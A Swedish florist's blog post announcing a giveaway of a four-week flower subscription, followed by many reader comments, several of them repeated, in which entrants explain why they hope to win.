TÄVLING!!!! Vinn ett blomsterabonemang :)

imageHej Vännen! Först vill jag bara passa på att tacka alla er som läser Bloggen, ni är FANTASTISKA!

Jag har tjatat om vårkänslor sista tiden, visat er ett litet utbud utav mina blommor & buketter.

Nu tycker jag att det är dags för en TÄVLING! Inget komplicerat! Du har chansen att vinna ett blomster abonnemang på 4veckor, till ett värde utav 1600:-  

En stor fin bukett med färska blommor att förgylla vardagen med… Låter det som någonting för dig?

image

För att vara med & tävla så gör du sähär:

DELA blogginlägget på Facebook,

lämna sedan en kommentar här inne på bloggen, med en motivering på varför just du ska vinna detta blomsterabonnemang.

-Inte så komplicerat, lycka till! 😉

Kramar My Martens

image

Ps Tävlar man inte så vinner man inte….. Alla har lika stor chans att vinna detta abonnemang, skulle en vinnare dras som inte bor i närheten utav min butik på Öland/Kalmar området så förmedlar jag blommorna till dig genom en Interflora kollega 🙂

192 Komentarer

 1. Hej
  delat på instagram. Vill gärna vinna blommor att pryda köksbordet med. Just den här perioden är det så fina blommor som kommer o som lyser upp mörkret o vi längtar efter våren. Hoppas på tur.
  Kram♡♡

 2. Hej, har inte facebook men hoppas jag får tävla ändå. Jag vill vinna för jag hade verkligen behövt lite vår känslor. Vackra blommor piggar upp som inget annat! Håller tummarna!:-)

 3. Jag skulle vilja ge en härlig bukett med blommor till dom som betyder mest för mig, mina barn Hilma och Ludvig. Vi har haft en jobbig höst med mycket förkylningar ovh öroninflammationer, så det skulle pigga upp med en underbart härlig bukett med rosa och vita blommor om barnen får bestämma

 4. Vill börja med att tacka för en intressant blogg ? Jag tycker att jag ska vinna för att jag på fredag avslutar en treårig universitetsutbildning. Det har varit en rolig men också slitsam tid. Med studiebidrag har det inte varit möjligt att unna sig sådan lyx som blommor.

 5. Delat på instagram. Delat på facebook.
  Kommenterar här och håller nu tummarna att det här året börjar med lite tur i livet ❤️ En fin bukett med levande blommor på köksbordet skulle förgylla middagen för mig och mina två söner. Det är vi 3 mot världen, då jag inte har en man som kan skämma bort mig med blommor så hoppas jag på turen här.
  Kram på dig My

 6. Har delat på instagram och Facebook ❤️️
  En blombukett kan betyda mycket för oss alla. För mig just nu så skulle de förgylla min tillvaro i livet något alldeles extra just nu då vårdnadstvisten är ett faktum och hoppet sinar! Men stark ska jag vara å kanske just en fin bukett kan få mig att le åtminstone när jag ser den på bordet stå ❤️️

 7. Jag skulle bli tok lycklig om jag vann ! Vem vill inte få fina blommor varje vecka ! Jag blir varm i hjärtat av färska blommor. Varje gång jag kollar på dina bilder på instagram önskar jag att jag bodde närmare Öland du gör otroligt vackra buketter

 8. när man har jobbat en lång dag är det härligt och underbar känsla bubblar i kroppen när man ser vår inspirerade blommor på bordet

 9. Åhhh det vore perfekt att vinna detta. Då min dotter 7 år alltid tjatar VARJE gång vi är i en affär där det finns blommor om att hon vill att vi köper,ex tulpaner, amaryllis krukväxter med fina färger etc. Hon verkligen älskar blommor!!! Hade varit underbart att få glädja henne i så många veckor med vackra blommor ?

 10. Älskar doften, det vackra med blommor och det gör mig så glad. Hoppas jag kunde dras som en vinnare – hade gjort mig liiiite lyckligare i 4 veckor ?

 11. Att vinna dessa blommor skulle göra att jag skulle få tummen ur och gå ner i källaren och hämta kartongerna så jag kan plocka ner julen. Sen att jag verkligen älskar färska blommor och bli lycklig av att komma in i din butik.

 12. WOOOW!! ? vilken helt underbar vinst, jag som älskar blommor och köper mig färska blommor varje fredag för att ha något fint att njuta av under helgen , det är ett bra knep att höja vinterhumöret lite över vattenytan, och vad lätt städningen går med en avslutning med att placera fredagsbuketten på vardagsrumsbordet ?
  Jag har delat tävlingsinlägget offentligt på FB under mitt namn Christina Frisberg
  Håller vaserna beredda och hoppas på att få fylla dem med vackra blomsterfång.
  Kramar till alla som vill ha och törs ta emot och behöver!1 ? <3

 13. 2014 AVSLUTADES SÅ FRUKTANSVÄRT <3
  Min svärfar har varit svårt sjuk länge i cancer fick vi besked om att de va i november men han har varit jättesjuk sen midsommar ungefär…så han somnade in den 9:e december..Vi åkte på resa då och landade på Arlanda den 22:a december då möts vi av NÄSTA TRAGEDI min ÄLSKADE lilla Mamma låg svårt medvetslös så min svåger va och hämtade oss på arlanda vi skulle åkte tåg men de ville vi skulle komma så fort vi kunde till sjukhuset – det var fruktansvärt o mötas av detta – vi vakade tillsammans i familjen och min MAMMA SOMNADE IN PÅ JULDAGEN på kvällen…så oväntat o jag är fortfarande i chock…
  Det va begravning i fredag´s den 9:e för min svärfar och nu väntar Mammas den 30:e vore underbart få vinna i den här tävlingen – blommor är så underbart…Och jag hoppas 2015 blir ett fint år och önskar de ska få börja så bra de kan trots att de är 2 begravningar nu i januari…
  Har delat på Fb, gillat o kommenterat på Instagram där jag heter , maijzan_68 – hoppfull varm kram från en lessen Maria i Falun

 14. Om jag vinner vackra buketter så ska jag dela med mig av dem till de som betyder mest för mig. Den första buketten ska min man få som ett tack för de 25 underbara år som har gått sen vi träffades, den andra ska jag ge till mina fantastiska barn som ger mig stor glädje varje dag. Den tredje ger jag mina föräldrar som alltid har funnits där för mig. Den fjärde buketten behåller jag själv

 15. Jag önskar att jag vinner detta just för att jag skulle behöva det. Blommor är mums för både ögonen och själen. Kanske skulle mina begynnande kråksparkar vid ögonen hållas i schack under denna månad, om jag fick se vackra blommor varje dag :-!?)

 16. skulle vara underbart att få vinna… Är sjukskriven och kan inte göra jätte mycket plus ekonomin som är helt åt skogen pga sjukskrivningen… Skiljer ju ett par tusen i månaden. Så det skulle värma nåt otroligt i hjärtat att få lite blommor att pigga upp vardagen med eftersom jag verkligen ÄLSKAR blommor… Och det är tråkigt att det tryter i kassan just nu. För tyvärr måste jag ju prioritera nu och därför blir det inga blommor att förgylla min dag med tyvärr. Så nu håller jag tummar och tår

 17. Hej My,nu har jag delat på IG. vill gärna vinna så jag kan ge min mamma alltihop, hon fyller 50 år snart och hon älskar blommor, hon skulle bli så lycklig

 18. Jag skulle dela dessa blommor med min mormor, städar åt henne varje vecka så hur vore det inte att få ställa fina blommor på bordet ? hoppas på tur !

 19. Hoppas på stor tur!
  Jag har precis kommit igång med träningen efter ett halvår av motgång. Jag hade älskat att få komma hem från gymet och belönas av att se en stor härlig bukett på bordet! Kram

 20. Skulle gärna vinna detta. I måndags när jag skulle cykla till jobbet så körde jag kull. Det var isgata. Slog mig illa i knät och sitter här nu med svullet och blått knä. Cykeln är inlämnad och jag blir hemma 1 vecka.
  Skulle bli så glad om jag vann detta.
  En krya på mig hälsning till mig själv. Det hade piggat upp.
  Hoppas på tur

 21. Hej My
  Jag skulle jätte gärna vilja vinna detta.
  Jag älskar blommor både inne och ute o lägger mycket tid på det.
  Men sista året har vi haft jobbigt med vår stora dotter som i maj 14 fick en njursjukdom, så tid och ork till blommor inte riktigt funnits.
  Härliga nya blommor skulle lysa upp huset och vardagen i det tråkiga.
  Kram på dig!
  Ps delat på facebook

 22. Hej
  delat på instagram. Vill gärna vinna blommor att pryda köksbordet med. Just den här perioden är det så fina blommor som kommer o som lyser upp mörkret o vi längtar efter våren. Hoppas på tur.
  Kram♡♡

 23. Hej, har inte facebook men hoppas jag får tävla ändå. Jag vill vinna för jag hade verkligen behövt lite vår känslor. Vackra blommor piggar upp som inget annat! Håller tummarna!:-)

 24. Är en trött sliten mamma till tre barn varav två med handikapp . På torsdag är det min 40-årsdag, en dag som vilken vardag som helst med allt arbete som krävs dygnet runt. Jag skulle bli så enormt glad om en bukett blommor kom till mig på min vanliga dag men ändå till en speciell dag – Min dag! kram fr pionen75 på instagram. (Följer instagrams tävlingsregler… Äger inget fb)

 25. Jag skulle vilja ge en härlig bukett med blommor till dom som betyder mest för mig, mina barn Hilma och Ludvig. Vi har haft en jobbig höst med mycket förkylningar ovh öroninflammationer, så det skulle pigga upp med en underbart härlig bukett med rosa och vita blommor om barnen får bestämma

 26. Vill börja med att tacka för en intressant blogg 🙂 Jag tycker att jag ska vinna för att jag på fredag avslutar en treårig universitetsutbildning. Det har varit en rolig men också slitsam tid. Med studiebidrag har det inte varit möjligt att unna sig sådan lyx som blommor.

 27. Delat på instagram. Delat på facebook.
  Kommenterar här och håller nu tummarna att det här året börjar med lite tur i livet ❤️ En fin bukett med levande blommor på köksbordet skulle förgylla middagen för mig och mina två söner. Det är vi 3 mot världen, då jag inte har en man som kan skämma bort mig med blommor så hoppas jag på turen här.

  Kram på dig My

 28. Tänk vilken lycka att få färska blommor varje vecka som kan göra denna mörka årstid lite ljusare! Du har en fantastisk blogg som jag blir inspirerad av! Jag har delat inlägget på Facebook!

 29. Älskar det goda i livet och det vackra runtomkring mig. Att få ha färska nya blommor i hemmet varje vecka skulle vara ljuvligt, vardagslyx när det är som bäst:)

 30. Har delat på instagram och Facebook ❤️️
  En blombukett kan betyda mycket för oss alla. För mig just nu så skulle de förgylla min tillvaro i livet något alldeles extra just nu då vårdnadstvisten är ett faktum och hoppet sinar! Men stark ska jag vara å kanske just en fin bukett kan få mig att le åtminstone när jag ser den på bordet stå ❤️️

 31. Jag skulle bli tok lycklig om jag vann ! Vem vill inte få fina blommor varje vecka ! Jag blir varm i hjärtat av färska blommor. Varje gång jag kollar på dina bilder på instagram önskar jag att jag bodde närmare Öland du gör otroligt vackra buketter

 32. Hej My! Om jag skulle vinna detta så skulle jag ge min fantastiska pappa och bonusmamma de. För dom är verkligen värda det.
  Dom gör verkligen allt för mig och min bror och när mina föräldrar separera för typ 4 år sen så var jag väldigt ledsen men jag vissa det inte så mycket men när jag träffa min bonusmamma Sofia för första gången bara älska jag henne. Hon har inga egna barn men nu är hon gravid och jag är väldigt barnkär så jag tycker det ska bli så himla kul. Men det har varit en jobbig väg innan det men ändå fantastik.❤️ Hon ser mig och min bror som sina egna barn och det märks verkligen.
  Det skulle betyda VÄLDIGT mycket om jag skulle få ge min pappa och Sofia en så himla fin blombukett för de är dom verkligen värda. Kram My från isabelle

 33. Förra året kantades av mycket tråkigheter då morfar hastigt gick bort & jag blev ensamstående mitt i allt.
  Med en knapp heltidstjänst och mycket sjukdommar har det varit ett kämpigt år för oss båda.
  Kände att nu vänder det detta året och vi två ska vara starka & fortsätta kämpa tillsammans, då kom nästa fall! Fick precis besked om att jag har Hypotyreos, så nu väntar en ny utmaning att klara av i livet för att fortsätta vara den bästa mamman ja kan till min lilleman!:)
  Älskar blommor och hade blivit så glad om ja fick in lite ljus och färg i allt det jobbiga som vart.❤️ Kram

 34. när man har jobbat en lång dag är det härligt och underbar känsla bubblar i kroppen när man ser vår inspirerade blommor på bordet

 35. Åhhh det vore perfekt att vinna detta. Då min dotter 7 år alltid tjatar VARJE gång vi är i en affär där det finns blommor om att hon vill att vi köper,ex tulpaner, amaryllis krukväxter med fina färger etc. Hon verkligen älskar blommor!!! Hade varit underbart att få glädja henne i så många veckor med vackra blommor 🙂

 36. Hejsan!
  Jag och min sambo bor tillsammans. Men han jobbar borta måndag till torsdag och det är ganska trist måste jag säga. En bukett fina blommor i veckan skulle absolut förgylla min vardag. Så helt enkelt det skulle vara toppen att vinna detta.
  Kram

 37. Om jag vann blommor i 4 veckor så skulle jag den första veckan ge en bukett med de vackraste blommor till min svägerska som precis förlorat sin älskade hund.
  Den andra veckan skulle jag ge en vårbukett till mina underbara arbetskamrater som stöttat mig under en lång och tung höst.
  Den tredje veckan skulle jag ge en kärleksfull bukett till min mamma o syster som vilar tillsammans på Slottskyrkogården i Kalmar som tack för att de från himlen håller ett vakande öga på mig och min familj. Den fjärde veckan skulle jag ge en hoppfull bukett till mig och min underbara familj för att väcka våra vårkänslor till liv och påminna oss om att livet är värdefullt och att man ska vara rädd om varandra ❤

 38. Älskar doften, det vackra med blommor och det gör mig så glad. Hoppas jag kunde dras som en vinnare – hade gjort mig liiiite lyckligare i 4 veckor 😉

 39. Åh jag skulle väldigt gärna vilja vinna! Älskar blommor och jag bor inte i närheten av Kalmar/Öland ?
  Måste bara tipsa dig som småbarnsförälder (och även er andra) om strumpsnoddar! http://sorterastrumpor.nu
  För alla er som tycker att tvättmaskinen käkar strumpor! Kan varmt rekommenderas, här försvinner inga strumpor längre ?

 40. Att vinna dessa blommor skulle göra att jag skulle få tummen ur och gå ner i källaren och hämta kartongerna så jag kan plocka ner julen. Sen att jag verkligen älskar färska blommor och bli lycklig av att komma in i din butik.

 41. WOOOW!! 🙂 vilken helt underbar vinst, jag som älskar blommor och köper mig färska blommor varje fredag för att ha något fint att njuta av under helgen , det är ett bra knep att höja vinterhumöret lite över vattenytan, och vad lätt städningen går med en avslutning med att placera fredagsbuketten på vardagsrumsbordet 🙂
  Jag har delat tävlingsinlägget offentligt på FB under mitt namn Christina Frisberg
  Håller vaserna beredda och hoppas på att få fylla dem med vackra blomsterfång.
  Kramar till alla som vill ha och törs ta emot och behöver!1 🙂 <3

 42. Hej My! Om jag skulle vinna detta så skulle jag ge min fantastiska pappa och bonusmamma de. För dom är verkligen värda det.
  Dom gör verkligen allt för mig och min bror och när mina föräldrar separera för typ 4 år sen så var jag väldigt ledsen men jag vissa det inte så mycket men när jag träffa min bonusmamma Sofia för första gången bara älska jag henne. Hon har inga egna barn men nu är hon gravid och jag är väldigt barnkär så jag tycker det ska bli så himla kul. Men det har varit en jobbig väg innan det men ändå fantastik.❤️ Hon ser mig och min bror som sina egna barn och det märks verkligen.
  Det skulle betyda VÄLDIGT mycket om jag skulle få ge min pappa och Sofia en så himla fin blombukett för de är dom verkligen värda. Kram My från isabelle

 43. 2014 AVSLUTADES SÅ FRUKTANSVÄRT <3

  Min svärfar har varit svårt sjuk länge i cancer fick vi besked om att de va i november men han har varit jättesjuk sen midsommar ungefär…så han somnade in den 9:e december..Vi åkte på resa då och landade på Arlanda den 22:a december då möts vi av NÄSTA TRAGEDI min ÄLSKADE lilla Mamma låg svårt medvetslös så min svåger va och hämtade oss på arlanda vi skulle åkte tåg men de ville vi skulle komma så fort vi kunde till sjukhuset – det var fruktansvärt o mötas av detta – vi vakade tillsammans i familjen och min MAMMA SOMNADE IN PÅ JULDAGEN på kvällen…så oväntat o jag är fortfarande i chock…
  Det va begravning i fredag´s den 9:e för min svärfar och nu väntar Mammas den 30:e vore underbart få vinna i den här tävlingen – blommor är så underbart…Och jag hoppas 2015 blir ett fint år och önskar de ska få börja så bra de kan trots att de är 2 begravningar nu i januari…
  Har delat på Fb, gillat o kommenterat på Instagram där jag heter , maijzan_68 – hoppfull varm kram från en lessen Maria i Falun

 44. Om jag vinner vackra buketter så ska jag dela med mig av dem till de som betyder mest för mig. Den första buketten ska min man få som ett tack för de 25 underbara år som har gått sen vi träffades, den andra ska jag ge till mina fantastiska barn som ger mig stor glädje varje dag. Den tredje ger jag mina föräldrar som alltid har funnits där för mig. Den fjärde buketten behåller jag själv

 45. Jag önskar att jag vinner detta just för att jag skulle behöva det. Blommor är mums för både ögonen och själen. Kanske skulle mina begynnande kråksparkar vid ögonen hållas i schack under denna månad, om jag fick se vackra blommor varje dag :-!?)

 46. skulle vara underbart att få vinna… Är sjukskriven och kan inte göra jätte mycket plus ekonomin som är helt åt skogen pga sjukskrivningen… Skiljer ju ett par tusen i månaden. Så det skulle värma nåt otroligt i hjärtat att få lite blommor att pigga upp vardagen med eftersom jag verkligen ÄLSKAR blommor… Och det är tråkigt att det tryter i kassan just nu. För tyvärr måste jag ju prioritera nu och därför blir det inga blommor att förgylla min dag med tyvärr. Så nu håller jag tummar och tår

 47. Hej My,nu har jag delat på IG. vill gärna vinna så jag kan ge min mamma alltihop, hon fyller 50 år snart och hon älskar blommor, hon skulle bli så lycklig

 48. Jag skulle dela dessa blommor med min mormor, städar åt henne varje vecka så hur vore det inte att få ställa fina blommor på bordet 🙂 hoppas på tur !

 49. Hoppas på stor tur!
  Jag har precis kommit igång med träningen efter ett halvår av motgång. Jag hade älskat att få komma hem från gymet och belönas av att se en stor härlig bukett på bordet! Kram

 50. Vilken underbar tävling du har lagt ut.
  Skulle vilja vinna den eftersom jag alltid få köpa mina blommor själv.
  Har försökt säga till gubben att det vore roligt med en vacker bukett blommor någon gång, Tyvärr får jag nog drömma vidare om det.
  Nu håller jag mina tummar hårt och hoppas på turen att det är just jag som vinner dina fina blommor. Skulle verkligen bli glad. Delar på FB

 51. Hej
  För lite mer än ett år sedan födde min lillasyster sitt andra efterlängtade barn. En flicka med nötbruna ögon och lockigt hår. Efter en tid visade den lilla tecken på att inte må så bra och det konstaterades att hon har ett mycket ovanligt handikapp där framtiden inte går att förutspå. Min fina älskade syster har haft ett mardröms år bakom sig och jag skulle om jag vann vilja förgylla hennes vardag med blommor.
  Linda

 52. Skulle gärna vinna detta. I måndags när jag skulle cykla till jobbet så körde jag kull. Det var isgata. Slog mig illa i knät och sitter här nu med svullet och blått knä. Cykeln är inlämnad och jag blir hemma 1 vecka.
  Skulle bli så glad om jag vann detta.
  En krya på mig hälsning till mig själv. Det hade piggat upp.
  Hoppas på tur

 53. Hej My
  Jag skulle jätte gärna vilja vinna detta.
  Jag älskar blommor både inne och ute o lägger mycket tid på det.
  Men sista året har vi haft jobbigt med vår stora dotter som i maj 14 fick en njursjukdom, så tid och ork till blommor inte riktigt funnits.
  Härliga nya blommor skulle lysa upp huset och vardagen i det tråkiga.
  Kram på dig!
  Ps delat på facebook

 54. Min älskade lillasyster @karinelsap ska i sommar gifta sig min sin underbare @grusbarn. De är båda den sortens människor som ständigt sätter andras välmående framför sitt eget och ibland glömmer bort sitt eget värde.. Jag tycker de är värda alla blommor i världen!

 55. Är en trött sliten mamma till tre barn varav två med handikapp . På torsdag är det min 40-årsdag, en dag som vilken vardag som helst med allt arbete som krävs dygnet runt. Jag skulle bli så enormt glad om en bukett blommor kom till mig på min vanliga dag men ändå till en speciell dag – Min dag! kram fr pionen75 på instagram. (Följer instagrams tävlingsregler… Äger inget fb)

 56. Vill väldigt gärna vinna!!!
  Har många gånger och lääänge tänkt/önskat att köpa stora fina buketter med blommor en gång i veckan. Älskar när det står fina blommor på bordet…! Men som mammaledig finns inte riktigt det utrymmet i ekonomin…

 57. Hej!!
  Det skulle vara kul att vinna en blomma till mitt bord, för att lysa upp vardagen i vintermörkret. Dessutom är det aldrig fel med fina blommor runt om i huset för att pigga upp en lite extra. Vad skulle våra fönster vara utan sina vackra växter!! ?

 58. Tänk vilken lycka att få färska blommor varje vecka som kan göra denna mörka årstid lite ljusare! Du har en fantastisk blogg som jag blir inspirerad av! Jag har delat inlägget på Facebook!

 59. Älskar det goda i livet och det vackra runtomkring mig. Att få ha färska nya blommor i hemmet varje vecka skulle vara ljuvligt, vardagslyx när det är som bäst:)

 60. Hej My! Om jag skulle vinna detta så skulle jag ge min fantastiska pappa och bonusmamma de. För dom är verkligen värda det.
  Dom gör verkligen allt för mig och min bror och när mina föräldrar separera för typ 4 år sen så var jag väldigt ledsen men jag vissa det inte så mycket men när jag träffa min bonusmamma Sofia för första gången bara älska jag henne. Hon har inga egna barn men nu är hon gravid och jag är väldigt barnkär så jag tycker det ska bli så himla kul. Men det har varit en jobbig väg innan det men ändå fantastik.❤️ Hon ser mig och min bror som sina egna barn och det märks verkligen.
  Det skulle betyda VÄLDIGT mycket om jag skulle få ge min pappa och Sofia en så himla fin blombukett för de är dom verkligen värda. Kram My från isabelle

 61. Jag älskar blommor då helst vita. En vacker blomma på bordet gör varje dag till en fest.
  Tävlar fast jag inte använder facebook. Hoppas jag får vara med och tävla ändå. Har besökt din affär många ggr så fina blommor du har.

 62. Förra året kantades av mycket tråkigheter då morfar hastigt gick bort & jag blev ensamstående mitt i allt.
  Med en knapp heltidstjänst och mycket sjukdommar har det varit ett kämpigt år för oss båda.
  Kände att nu vänder det detta året och vi två ska vara starka & fortsätta kämpa tillsammans, då kom nästa fall! Fick precis besked om att jag har Hypotyreos, så nu väntar en ny utmaning att klara av i livet för att fortsätta vara den bästa mamman ja kan till min lilleman!:)

  Älskar blommor och hade blivit så glad om ja fick in lite ljus och färg i allt det jobbiga som vart.❤️ Kram

 63. Hejsan!
  Jag och min sambo bor tillsammans. Men han jobbar borta måndag till torsdag och det är ganska trist måste jag säga. En bukett fina blommor i veckan skulle absolut förgylla min vardag. Så helt enkelt det skulle vara toppen att vinna detta.
  Kram

 64. Om jag vann blommor i 4 veckor så skulle jag den första veckan ge en bukett med de vackraste blommor till min svägerska som precis förlorat sin älskade hund.
  Den andra veckan skulle jag ge en vårbukett till mina underbara arbetskamrater som stöttat mig under en lång och tung höst.
  Den tredje veckan skulle jag ge en kärleksfull bukett till min mamma o syster som vilar tillsammans på Slottskyrkogården i Kalmar som tack för att de från himlen håller ett vakande öga på mig och min familj. Den fjärde veckan skulle jag ge en hoppfull bukett till mig och min underbara familj för att väcka våra vårkänslor till liv och påminna oss om att livet är värdefullt och att man ska vara rädd om varandra ❤

 65. Åh jag skulle väldigt gärna vilja vinna! Älskar blommor och jag bor inte i närheten av Kalmar/Öland 😉

  Måste bara tipsa dig som småbarnsförälder (och även er andra) om strumpsnoddar! http://sorterastrumpor.nu
  För alla er som tycker att tvättmaskinen käkar strumpor! Kan varmt rekommenderas, här försvinner inga strumpor längre 😉

 66. Jag älskar blommor och har alltid gjort. Redan från skolstart så stannade jag varje dag på väg hem från skolbussen under vår och sommar och plockade en bukett blommor och gav min mamma. När jag var yngre så jobbade jag som florist och älskade varje dag i yrket, men fick tyvärr sluta pga skada. Jag har varje dag sedan dess saknat den underbara doften och åsynen av blommor som man får förmånen att uppleva som florist i butiken. Då jag varit ensamstående med mina 2 döttrar sedan ett antal år tillbaka så har jag inte möjlighet att kosta på mig blommor på det sätt som jag skulle önska. Så en vinst skulle innebära en underbar lycka och njutning för mig på alla sätt.

 67. Är med i tävlingen för jag skulle så gärna vilja ge bort en stor fin härlig vårbukett till mina underbara svärföräldrar som ställer upp i vått och torrt! Blommor är alltid glädjande och piggar upp så i hemmet. Hoppas på att turen är på min sida, hade varit så kul! ✊ Tack för en fin blogg!

 68. Hej My! Om jag skulle vinna detta så skulle jag ge min fantastiska pappa och bonusmamma de. För dom är verkligen värda det.
  Dom gör verkligen allt för mig och min bror och när mina föräldrar separera för typ 4 år sen så var jag väldigt ledsen men jag vissa det inte så mycket men när jag träffa min bonusmamma Sofia för första gången bara älska jag henne. Hon har inga egna barn men nu är hon gravid och jag är väldigt barnkär så jag tycker det ska bli så himla kul. Men det har varit en jobbig väg innan det men ändå fantastik.❤️ Hon ser mig och min bror som sina egna barn och det märks verkligen.
  Det skulle betyda VÄLDIGT mycket om jag skulle få ge min pappa och Sofia en så himla fin blombukett för de är dom verkligen värda. Kram My från isabelle

 69. Då jag är hemma och sjukskriven vore det trevligt att bli glad och uppiggad av fina blommor. Skulle även dela med mig då flera i min omgivning är sjukskrivna och också behöver glädjas. (Delat på Facebook)

 70. Hej My! Jag är en nybliven mamma med ringar under ögonen och som knappt orkar dra på mig annat än myspys-kläder. Just nu blir det alltså inga blommor till mig (jag ska ta min man i försvar dock och säga att han är lika trött och sliten för tillfället). Det hade varit underbart, helt underbart att få ha vackra blommor hemma i flera veckor (och nu är jag ju hemma och kan njuta av dem ordentligt!)
  Blir lite tårögd när jag ser framför mig hur blommorna står på soffbordet <3

 71. Tack för tävlingen, nu fick jag upp ögonen för din blogg också, kul! ? …vi är nog många som vill vinna detta abonnemang, men som jag skrev på IG så ska jag börja min efterlängtade resa till florist snart och du är verkligen nån som inspirerar mig. Det skulle vara så underbart att få vinna och få dela med mig av blommorna till min lilla mamma som lever ensam. Att överraska henne med vackra blommor skulle göra hennes dag.

 72. Vilken underbar tävling du har lagt ut.
  Skulle vilja vinna den eftersom jag alltid få köpa mina blommor själv.
  Har försökt säga till gubben att det vore roligt med en vacker bukett blommor någon gång, Tyvärr får jag nog drömma vidare om det.
  Nu håller jag mina tummar hårt och hoppas på turen att det är just jag som vinner dina fina blommor. Skulle verkligen bli glad. Delar på FB

 73. Hej! Vilken härlig tävling.
  Min pappa fyller 70 år nästa vecka och det skulle vara så roligt att ge honom en stor, vacker bukett med blommor.
  Vill passa på att berätta hur mycket jag gillar din affär. Gör alltid ett besök när jag är i närheten.

 74. Hej
  För lite mer än ett år sedan födde min lillasyster sitt andra efterlängtade barn. En flicka med nötbruna ögon och lockigt hår. Efter en tid visade den lilla tecken på att inte må så bra och det konstaterades att hon har ett mycket ovanligt handikapp där framtiden inte går att förutspå. Min fina älskade syster har haft ett mardröms år bakom sig och jag skulle om jag vann vilja förgylla hennes vardag med blommor.
  Linda

 75. Hej!
  Tack för en fin blogg.
  Vem skulle inte vilja vinna dessa fina buketter.
  Vinner jag skulle jag ge min vinst till min svägerska som har hjälpt oss i svåra stunder men oxå i glädje då våra barn föddes som idag är snart 4-2.utan henne har det varit tufft .

 76. Min älskade lillasyster @karinelsap ska i sommar gifta sig min sin underbare @grusbarn. De är båda den sortens människor som ständigt sätter andras välmående framför sitt eget och ibland glömmer bort sitt eget värde.. Jag tycker de är värda alla blommor i världen!

 77. Vill väldigt gärna vinna!!!
  Har många gånger och lääänge tänkt/önskat att köpa stora fina buketter med blommor en gång i veckan. Älskar när det står fina blommor på bordet…! Men som mammaledig finns inte riktigt det utrymmet i ekonomin…

 78. Hej!!
  Det skulle vara kul att vinna en blomma till mitt bord, för att lysa upp vardagen i vintermörkret. Dessutom är det aldrig fel med fina blommor runt om i huset för att pigga upp en lite extra. Vad skulle våra fönster vara utan sina vackra växter!! 🙂

 79. Delat på Fb!
  Åhh det skulle vara toppen att vinna detta underbara pris! En blombukett kan ju verkligen förgylla dagen lite extra! Lite nytt och fräscht gör att man får lite vårkänslor..och det behövs ju alltid! Tummen upp för detta!
  Kram Ann

 80. Jag älskar blommor då helst vita. En vacker blomma på bordet gör varje dag till en fest.
  Tävlar fast jag inte använder facebook. Hoppas jag får vara med och tävla ändå. Har besökt din affär många ggr så fina blommor du har.

 81. Jag älskar blommor och har alltid gjort. Redan från skolstart så stannade jag varje dag på väg hem från skolbussen under vår och sommar och plockade en bukett blommor och gav min mamma. När jag var yngre så jobbade jag som florist och älskade varje dag i yrket, men fick tyvärr sluta pga skada. Jag har varje dag sedan dess saknat den underbara doften och åsynen av blommor som man får förmånen att uppleva som florist i butiken. Då jag varit ensamstående med mina 2 döttrar sedan ett antal år tillbaka så har jag inte möjlighet att kosta på mig blommor på det sätt som jag skulle önska. Så en vinst skulle innebära en underbar lycka och njutning för mig på alla sätt.

 82. Är med i tävlingen för jag skulle så gärna vilja ge bort en stor fin härlig vårbukett till mina underbara svärföräldrar som ställer upp i vått och torrt! Blommor är alltid glädjande och piggar upp så i hemmet. Hoppas på att turen är på min sida, hade varit så kul! ✊ Tack för en fin blogg!

 83. Då jag är hemma och sjukskriven vore det trevligt att bli glad och uppiggad av fina blommor. Skulle även dela med mig då flera i min omgivning är sjukskrivna och också behöver glädjas. (Delat på Facebook)

 84. Hej My! Jag är en nybliven mamma med ringar under ögonen och som knappt orkar dra på mig annat än myspys-kläder. Just nu blir det alltså inga blommor till mig (jag ska ta min man i försvar dock och säga att han är lika trött och sliten för tillfället). Det hade varit underbart, helt underbart att få ha vackra blommor hemma i flera veckor (och nu är jag ju hemma och kan njuta av dem ordentligt!)

  Blir lite tårögd när jag ser framför mig hur blommorna står på soffbordet <3

 85. Tack för tävlingen, nu fick jag upp ögonen för din blogg också, kul! 🙂 …vi är nog många som vill vinna detta abonnemang, men som jag skrev på IG så ska jag börja min efterlängtade resa till florist snart och du är verkligen nån som inspirerar mig. Det skulle vara så underbart att få vinna och få dela med mig av blommorna till min lilla mamma som lever ensam. Att överraska henne med vackra blommor skulle göra hennes dag.

 86. Hej! Vilken härlig tävling.

  Min pappa fyller 70 år nästa vecka och det skulle vara så roligt att ge honom en stor, vacker bukett med blommor.

  Vill passa på att berätta hur mycket jag gillar din affär. Gör alltid ett besök när jag är i närheten.

 87. Hej!
  Tack för en fin blogg.
  Vem skulle inte vilja vinna dessa fina buketter.
  Vinner jag skulle jag ge min vinst till min svägerska som har hjälpt oss i svåra stunder men oxå i glädje då våra barn föddes som idag är snart 4-2.utan henne har det varit tufft .

 88. Delat på Fb!
  Åhh det skulle vara toppen att vinna detta underbara pris! En blombukett kan ju verkligen förgylla dagen lite extra! Lite nytt och fräscht gör att man får lite vårkänslor..och det behövs ju alltid! Tummen upp för detta!
  Kram Ann

 89. Så här i vintermörkret önskar väl alla att få lite glädje och inspiration! Och det finns inget som är mer inspirerande och uppiggande än vackra blomsterarrangemang! Så nu hoppas jag på få information i massor!

 90. Jag skulle vilja vinna detta dels till mig själv, som i år ”firar” 10årsjubileum som ensam mamma sedan barnens far gick bort i cancer.
  Men jag kommer även att dela med mig, då det finns fler i min omgivning som förtjänar/behöver en fin blombukett, som uppmuntring eller tröst.

 91. Skulle ju vara fantastiskt roligt att få vinna just denna tävling. Blommor förgyller ju verkligen vardagen för både stora & små. Den här årstiden piggar det upp lite extra med en blombukett då det mesta utanför fönstret går i någonslags gråton.

 92. Vi är en grupp undersköterskor som jobbar i hemtjänsten, där vi gör allt för att hjälpa och förgylla dagarna för våra brukare. Vi älskar vårt jobb trots stressen som ofta är vår vardag. Det vore himmelriket att få förgylla lite i vår egen tillvaro med vackra blommor som möter oss varje gång vi kliver in på vår arbetsplats ☺

 93. Så här i vintermörkret önskar väl alla att få lite glädje och inspiration! Och det finns inget som är mer inspirerande och uppiggande än vackra blomsterarrangemang! Så nu hoppas jag på få information i massor!

 94. Jag skulle vilja vinna detta dels till mig själv, som i år ”firar” 10årsjubileum som ensam mamma sedan barnens far gick bort i cancer.
  Men jag kommer även att dela med mig, då det finns fler i min omgivning som förtjänar/behöver en fin blombukett, som uppmuntring eller tröst.

 95. Skulle ju vara fantastiskt roligt att få vinna just denna tävling. Blommor förgyller ju verkligen vardagen för både stora & små. Den här årstiden piggar det upp lite extra med en blombukett då det mesta utanför fönstret går i någonslags gråton.

